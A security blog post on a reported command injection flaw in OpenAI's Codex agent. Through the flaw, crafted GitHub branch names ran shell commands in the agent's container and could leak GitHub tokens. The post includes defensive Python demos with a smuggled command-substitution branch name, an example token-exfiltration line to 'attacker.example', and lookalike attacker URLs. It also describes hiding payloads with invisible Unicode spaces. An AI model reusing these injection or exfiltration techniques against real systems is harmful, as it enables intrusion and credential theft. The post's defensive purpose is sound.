OpenAI Codex Vulnerability Exposes GitHub Token Risk


Hoplon InfoSec

07 Apr, 2026

Did the OpenAI Codex vulnerability really let attackers steal GitHub user access tokens?

Yes. Public reporting and the original research say attackers could abuse a command injection path tied to GitHub branch handling in Codex, execute shell commands inside the working container, and exfiltrate GitHub user access tokens.

OpenAI patched the issue after responsible disclosure, and reporting around the fix points to remediation completed by February 20, 2026.

When stories like this break, the first reaction is usually the same. People assume it is just another niche bug that matters only to security teams. This one feels different.

The OpenAI Codex vulnerability hit a nerve because it touched a part of modern software work that developers now treat as normal: connecting an AI coding agent directly to real repositories, real secrets, and real production-adjacent workflows.

That is what makes this incident bigger than a single patch note. The problem was not simply that an attacker could run a tricky payload.

It was that an AI-powered coding environment, designed to save time and reduce friction, briefly became a route to GitHub access token compromise. For teams that rely on connected tools, that is the part worth sitting with for a minute. Convenience is great right up until it quietly expands your blast radius.

What happened?

At the center of the story was a Codex command injection vulnerability tied to how Codex handled GitHub branch names during task creation.

Researchers at BeyondTrust Phantom Labs reported that malicious input placed in a branch name could be interpreted in a way that let arbitrary shell commands run inside the Codex container.

Once code execution happened, the attacker could attempt to pull out authentication material and send it to a server they controlled.

That turns a small-looking input problem into a bigger operational problem. A branch name should just be a label.

In this case, public reporting says it became a delivery mechanism. The exploit chain described by researchers centered on command execution in the environment where Codex was operating on connected repositories, which is why the story quickly moved from “interesting bug” to “serious security incident.”

The most alarming claim in the reporting was the potential theft of the GitHub OAuth tokens used by OpenAI Codex, including short-lived user access tokens.

Those tokens may not live forever, but even temporary credentials can be enough to read code, move across projects, or perform actions before defenders notice.

GitHub’s own guidance consistently stresses least privilege and tighter token scope precisely because a leaked token can act like a temporary master key in the wrong hands.

Why this bug got so much attention

A lot of security stories fade because the impact feels abstract. This one did not. The OpenAI Codex GitHub token theft angle was easy to understand even for readers who do not live in Bash every day.

Developers know what a GitHub token means. It means access. It means automation. Sometimes it means the difference between a private repository staying private and suddenly becoming someone else’s playground.

There is also a broader industry lesson here. An AI coding agent vulnerability is not only about model behavior.

It is about everything wrapped around the model: shell calls, repo integrations, secret handling, network permissions, approval flows, and the assumptions teams make when they hear the word “sandbox.”

OpenAI’s current Codex documentation emphasizes approvals, sandboxing, and network controls, and its agent security guidance states that network access is off by default. That tells you how central these guardrails are to safe operation.

The other reason this story traveled fast is that it fit a growing pattern. AI tools are no longer just suggesting code in a sidebar.

They clone repositories, open pull requests, analyze code reviews, and run inside cloud environments.

Once a tool can both think and act, even a familiar bug class like command injection starts to look more dangerous. You are not just protecting a terminal command anymore. You are protecting a workflow that may already be trusted by humans and systems around it.




How the OpenAI Codex exploit reportedly worked

The simple version of how the OpenAI Codex vulnerability worked is this: a hostile value was introduced where Codex expected a normal branch name, that value was handled unsafely in a shell context, and the resulting command execution created an opportunity to steal tokens.

That is the whole movie in one sentence. The longer version is where the real lessons live.

According to public reporting, the attacker could create a specially crafted GitHub branch and set it up so Codex would interact with it during task creation or a review flow.

Once the unsafe branch value reached the shell layer, arbitrary commands could run in the Codex environment.

Researchers also described the use of hidden Unicode spacing to help obscure malicious payloads from human reviewers, which made the trick harder to spot in a quick visual check.

That detail matters because it shows how social camouflage and technical exploitation can overlap in one attack chain.

This is why the phrase "branch name command injection" sounds so strange at first and so obvious a few minutes later. Branch names feel harmless because developers see them all day.

But any input that crosses a trust boundary and lands in a shell command can become dangerous if it is not validated and escaped correctly. It is the old lesson of secure coding wearing a very modern outfit.

To make that concrete, imagine giving a delivery driver your house number, and instead of reading it as an address, the system treats it like a set of instructions for opening the garage, changing the locks, and forwarding your mail.

That is obviously absurd in the real world. In software, though, that category error happens more often than teams like to admit. A string becomes a command. A label becomes execution. That is command injection.
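The category error can be shown in a few lines of Python. This is a minimal sketch, not Codex's code, which the reporting does not publish. The branch name and function names are hypothetical, and the unsafe case assumes a POSIX shell. Git rejects ASCII spaces in ref names, so the hostile value uses the shell variable `${IFS}` to smuggle whitespace into the injected command. The first function pastes the value into a shell string. The second quotes it with `shlex.quote`. The third avoids the shell entirely by passing an argument list.

```python
import shlex
import subprocess
import sys

# Hypothetical attacker-controlled branch name. "$(...)" is shell command
# substitution; ${IFS} expands to whitespace, standing in for the space
# that Git does not allow in a ref name.
HOSTILE_BRANCH = "feature/x$(echo${IFS}INJECTED)"


def unsafe_echo(branch: str) -> str:
    # UNSAFE: the branch is pasted into a shell command string, so the
    # shell expands and runs anything embedded in it.
    result = subprocess.run(f"echo {branch}", shell=True,
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def quoted_echo(branch: str) -> str:
    # If a shell is truly unavoidable, quote the value so the shell sees
    # one literal word instead of code.
    result = subprocess.run(f"echo {shlex.quote(branch)}", shell=True,
                            capture_output=True, text=True, check=True)
    return result.stdout.strip()


def argv_echo(branch: str) -> str:
    # Preferred: no shell at all. The branch reaches the child process as a
    # single argument and is never parsed as a command.
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", branch]
    result = subprocess.run(child, capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print(unsafe_echo(HOSTILE_BRANCH))  # the injected command ran
    print(quoted_echo(HOSTILE_BRANCH))  # printed literally
    print(argv_echo(HOSTILE_BRANCH))    # printed literally
```

Passing an argument list is the sturdier design choice. Quoting only protects the call sites that remember to do it.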

The role of hidden Unicode

One of the stranger details in the reporting involved the use of the Ideographic Space character, U+3000.

Researchers said this could help hide malicious content from human eyes while still allowing Bash to interpret it in ways that supported the exploit.

It is the kind of detail that sounds tiny until you remember how much security review still depends on visual inspection. If a payload is hard to see, defenders lose precious time.

That detail also helps explain why the OpenAI Codex branch name exploit sparked concern beyond a single product.

Plenty of teams still trust eyeballing. A suspicious script with obvious punctuation might draw scrutiny.

A nearly invisible payload tucked into a value that looks routine is another story. When people say modern attacks are getting weird, this is the kind of weird they mean. Not louder. Quieter.
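Visual review is the weak point, so an automated check can flag characters a reviewer may not see. This is a minimal sketch using Python's standard `unicodedata` module. The function name is hypothetical. The rule it applies is an illustrative policy, not the one OpenAI adopted: report any space separator other than the ASCII space (which catches U+3000), any control character, and any invisible format character such as a zero-width space.

```python
import unicodedata


def suspicious_characters(value: str) -> list[tuple[int, str, str]]:
    """Return (index, code point, Unicode name) for characters that a human
    reviewer may not notice in a branch name or similar label."""
    findings = []
    for index, char in enumerate(value):
        category = unicodedata.category(char)
        unusual_space = category == "Zs" and char != " "  # e.g. U+3000
        control = category == "Cc"                        # e.g. tab, escape
        invisible_format = category == "Cf"               # e.g. U+200B
        if unusual_space or control or invisible_format:
            name = unicodedata.name(char, "UNKNOWN")
            findings.append((index, f"U+{ord(char):04X}", name))
    return findings


if __name__ == "__main__":
    print(suspicious_characters("feature/login-fix"))  # []
    print(suspicious_characters("main\u3000x"))        # [(4, 'U+3000', 'IDEOGRAPHIC SPACE')]
```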

What was actually at risk

The direct risk described in the reporting was OpenAI Codex GitHub token theft. But that phrase only tells part of the story.

A stolen token can unlock repositories, code history, workflow context, and in some cases the ability to move into connected projects.

Researchers and follow-up coverage warned about possible lateral movement in enterprise environments, which is where the damage could become disproportionate to the original bug.

This is also where an OAuth token compromise through OpenAI Codex becomes a business problem, not just a technical one.

If a coding agent has access to a shared repository used by multiple engineers, a token leak can ripple outward fast. Private code, deployment pipelines, internal libraries, or customer-specific logic might all be in scope depending on permissions.

GitHub’s documentation repeatedly points teams toward fine-grained permissions, short-lived tokens, secret storage, and revocation readiness because the cost of one leak is rarely contained to one machine.

There is another uncomfortable truth here. Even short-lived credentials can be very useful to an attacker if they are exfiltrated in real time.

Security teams sometimes hear “temporary token” and mentally downgrade the threat. That can be a mistake.

Short life reduces exposure, but it does not erase exposure. A burglar does not need your keys forever if they only plan to empty the house tonight.
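The arithmetic behind "short life reduces exposure, but does not erase it" fits in a few lines. This sketch assumes GitHub's default 8-hour lifetime for GitHub App user access tokens. The reporting does not say what lifetime the exposed Codex tokens actually had, and the function name and timestamps are hypothetical.

```python
from datetime import datetime, timedelta
from typing import Optional

# Assumption: GitHub App user access tokens expire 8 hours after issue by
# default. The lifetime of the tokens exposed through Codex is not reported.
USER_TOKEN_LIFETIME = timedelta(hours=8)


def attacker_window(issued_at: datetime, stolen_at: datetime,
                    revoked_at: Optional[datetime] = None,
                    lifetime: timedelta = USER_TOKEN_LIFETIME) -> timedelta:
    """How long a stolen token stays usable: until it expires or is revoked,
    whichever comes first."""
    end = issued_at + lifetime
    if revoked_at is not None:
        end = min(end, revoked_at)
    return max(end - stolen_at, timedelta(0))


if __name__ == "__main__":
    issued = datetime(2026, 1, 1, 9, 0)
    stolen = issued + timedelta(minutes=5)
    print(attacker_window(issued, stolen))  # 7:55:00
    print(attacker_window(issued, stolen, revoked_at=issued + timedelta(minutes=20)))  # 0:15:00
```

A token exfiltrated in real time can still leave hours of access. Fast revocation, not expiry alone, is what shrinks the window.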

Surfaces reportedly affected

Public reporting tied the flaw to more than one Codex surface. Coverage said the issue extended beyond one interface and could affect the ChatGPT website flow for Codex, the SDK, CLI-related workflows, and IDE-connected scenarios in which repository and token access were present.

That wider reach is one reason the incident drew so much attention in the developer world. This was not framed as a quirky bug in a hidden beta corner.

OpenAI’s product documentation shows how integrated Codex is with GitHub and cloud environments, including GitHub reviews, Codex cloud tasks, and CI-oriented workflows.

That is useful context because it shows why researchers focused on token exposure and repo-linked actions. The more an agent can do for you, the more carefully its permissions need to be fenced in.

What OpenAI changed

Reporting says OpenAI patched the issue after responsible disclosure. The changes described across coverage included stronger input validation, improved shell command protections, and tighter controls around token exposure, scope, and lifetime. Another report tied the relevant fixes to February 20, 2026.

That response matters, but it is not the whole story. A patch fixes the reported flaw. It does not erase the lesson. The bigger takeaway from this OpenAI Codex security flaw is that AI development platforms now deserve the same threat modeling rigor teams already apply to CI/CD, cloud access, and identity systems. If it can read code, run commands, and authenticate to another platform, it belongs in the serious-tools category, not the novelty-tools category.

What developers and security teams should do now

The first step is boring, which usually means it is important. Rotate exposed or potentially exposed credentials. GitHub documents revocation paths and emphasizes secure storage, least privilege, and careful handling of API credentials.

If your team used Codex with sensitive repositories during the affected period and you are not fully sure what was exposed, token rotation is the kind of low-drama move that often prevents a high-drama week.

Second, review permissions. This is where preventing GitHub token theft in AI coding tools becomes less about theory and more about inventory.

Which repos can the agent access? Are tokens fine-grained or overly broad? Is there approval required for sensitive actions?

GitHub recommends least privilege for workflow tokens and offers approval policies for fine-grained personal access tokens in organizations and enterprises. Those controls exist for days like this.
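Part of that inventory can be automated. For OAuth tokens and classic personal access tokens, GitHub's REST API reports the granted scopes in the `X-OAuth-Scopes` response header, for example on an authenticated request to `/user`. The sketch below parses that header value and flags broad scopes. What counts as "broad" here is an illustrative choice, not an official GitHub category. Fine-grained tokens are described by permissions rather than scopes, so this check does not cover them.

```python
# Classic OAuth scopes that grant wide write or admin power. This set is an
# illustrative policy choice, not an official GitHub classification.
BROAD_SCOPES = frozenset({
    "repo", "workflow", "delete_repo",
    "admin:org", "admin:repo_hook", "admin:org_hook",
})


def broad_scopes(x_oauth_scopes: str) -> set[str]:
    """Parse a comma-separated X-OAuth-Scopes header value and return the
    granted scopes that appear in BROAD_SCOPES."""
    granted = {scope.strip() for scope in x_oauth_scopes.split(",") if scope.strip()}
    return granted & BROAD_SCOPES


if __name__ == "__main__":
    header = "repo, read:org, workflow"  # hypothetical header value
    print(sorted(broad_scopes(header)))  # ['repo', 'workflow']
```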

Third, tighten runtime controls. OpenAI’s current Codex security guidance highlights approvals, sandboxing, and network access settings, with network access off by default in the high-level guidance.

For organizations, that should translate into stricter defaults, less ambient authority, and a habit of treating agent connectivity as something to be deliberately granted, not casually assumed.
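"Deliberately granted, not casually assumed" translates naturally into a deny-by-default egress check. The sketch below is hypothetical policy code, not Codex's network configuration, which is controlled through Codex's own settings. The allowlisted hosts are placeholders for whatever a given task genuinely needs.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for a repo-connected agent task.
ALLOWED_HOSTS = frozenset({"github.com", "api.github.com"})


def egress_allowed(url: str, allowed_hosts: frozenset[str] = ALLOWED_HOSTS) -> bool:
    """Deny by default: allow only HTTPS requests whose host exactly matches
    an allowlisted name (no suffix or substring matching)."""
    parts = urlsplit(url)
    host = parts.hostname or ""  # urlsplit lowercases the hostname
    return parts.scheme == "https" and host in allowed_hosts


if __name__ == "__main__":
    for url in ["https://api.github.com/user",
                "https://github.com.attacker.example/x",
                "https://api.github.com@attacker.example/"]:
        print(url, egress_allowed(url))
```

Exact host matching matters. A substring test such as `"github.com" in url` would approve both lookalike URLs in the example.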

Finally, log and monitor. If a coding agent can reach an external endpoint, unusual outbound traffic matters. If a repo-connected task suddenly behaves oddly, task logs matter.

If a branch name looks weird, do not laugh and move on. Weird input has paid attackers’ bills for years. In the age of agentic tooling, it may pay them faster.
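For the monitoring step, one cheap signal is a GitHub token showing up in a task log or an outbound request body. GitHub's current token formats carry recognizable prefixes, which the sketch below matches. The minimum-length threshold is a heuristic assumption, and the function name is hypothetical.

```python
import re

# GitHub token prefixes: ghp_ (classic personal access token), gho_ (OAuth
# access token), ghu_ (GitHub App user access token), ghs_ (GitHub App
# installation token), ghr_ (refresh token), github_pat_ (fine-grained PAT).
# The {20,} minimum length is a heuristic, not an exact format rule.
TOKEN_PATTERN = re.compile(
    r"\b(?:gh[pousr]_[A-Za-z0-9]{20,}|github_pat_[A-Za-z0-9_]{20,})"
)


def redact_tokens(text: str) -> tuple[str, int]:
    """Replace anything shaped like a GitHub token and return the redacted
    text together with the number of matches (nonzero means: alert)."""
    return TOKEN_PATTERN.subn("[REDACTED-GITHUB-TOKEN]", text)


if __name__ == "__main__":
    fake = "ghu_" + "a1B2" * 9  # token-shaped dummy string, not a real credential
    print(redact_tokens(f"POST https://attacker.example/collect token={fake}"))
```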

Quick risk table

| Area | Why it mattered here | What to do |
|---|---|---|
| Branch input | Unsafe handling enabled AI coding agent command injection | Validate and escape every repo-derived input |
| Token exposure | User tokens could be exfiltrated from the working environment | Rotate tokens, minimize scopes, shorten lifetimes |
| Network egress | Outbound requests can turn code execution into theft | Restrict network access unless explicitly needed |
| Shared repos | One compromised workflow may affect multiple users | Segment access and review repo sharing policies |
| Human review | Hidden Unicode can make payloads harder to spot | Use automated validation, not visual checks alone |


The table looks simple, but the pattern is old. Treat every untrusted input as dangerous, every secret as already halfway to being leaked, and every convenient integration as something that needs rules.

Security teams have been saying versions of that for years. The difference now is that AI agents make bad assumptions travel farther, faster, and with less human friction.
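The table's first row, validating repo-derived input, can be sketched as a strict allowlist for branch names. This is a hypothetical policy, deliberately narrower than Git's own ref-name rules (documented under `git check-ref-format`). It accepts only ASCII letters, digits, `.`, `_`, and `-` in `/`-separated segments. A value carrying shell syntax or an invisible Unicode space is therefore rejected before any tool touches it. This is defense in depth, not a substitute for keeping branch names out of shell strings.

```python
import re

# Hypothetical policy: ASCII-only segments separated by single slashes.
# Character ranges are spelled out so non-ASCII letters and spaces never match.
SEGMENT = r"[A-Za-z0-9._-]+"
BRANCH_PATTERN = re.compile(rf"{SEGMENT}(?:/{SEGMENT})*")


def is_acceptable_branch(name: str, max_length: int = 100) -> bool:
    """Allowlist check for a repo-derived branch name."""
    if not name or len(name) > max_length:
        return False
    # Reject forms that are confusing or invalid in Git: a leading dash
    # (looks like a CLI option), "..", a "." or ".lock" suffix, and
    # path segments that start with a dot.
    if name.startswith("-") or ".." in name or name.endswith((".", ".lock")):
        return False
    if any(segment.startswith(".") for segment in name.split("/")):
        return False
    return BRANCH_PATTERN.fullmatch(name) is not None


if __name__ == "__main__":
    for candidate in ["feature/login-fix", "main\u3000x", "x$(id)", "-rf"]:
        print(repr(candidate), is_acceptable_branch(candidate))
```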

What this incident really tells us

Treat every AI-connected developer workflow as part of your identity surface.

Prefer fine-grained, short-lived, tightly approved credentials whenever possible.

Keep agent network access off unless a task truly requires it.

Add monitoring for unusual repo-linked task behavior and outbound calls.

Train engineers to treat odd branch names and hidden characters as a real signal, not a curiosity.

Rehearse token revocation so a future incident feels procedural, not chaotic.

FAQ

Was there a CVE for this issue?

As of April 7, 2026, I could not verify a public CVE assignment for this specific Codex issue in the sources reviewed. Some third-party pages use CVE-like wording, but the reliable reporting I reviewed did not confirm an official CVE identifier.

Was the OpenAI Codex vulnerability patched?

Yes. Multiple reports say OpenAI patched the issue after responsible disclosure, with one report stating the fix was completed by February 20, 2026.

Why is this called an OpenAI Codex command injection issue?

Because the reported exploit path involved unsafe handling of a GitHub branch value that reached shell execution, allowing arbitrary commands to run in the Codex environment.

What should teams do first after reading about this?

Rotate credentials, review token scopes, tighten approvals, and restrict agent network access where possible. Those are the fastest practical steps supported by current GitHub and OpenAI guidance.

Final takeaway

The OpenAI Codex vulnerability will probably be remembered for the headline about GitHub tokens, but the deeper lesson is about trust boundaries. Modern coding agents sit in places that used to be reserved for carefully managed developer tooling.

They can read code, run commands, talk to external systems, and act with real credentials. That combination is productive, and it is also dangerous when basic security hygiene slips.

If there is one practical takeaway, it is this: treat AI coding platforms like privileged infrastructure, not smart autocomplete.

That mindset alone would prevent a lot of painful surprises, including the next Codex vulnerability headline that nobody wants to read over morning coffee.


Quick Security Tips: Validate inputs, limit token access, rotate credentials, and monitor activity to stay secure.
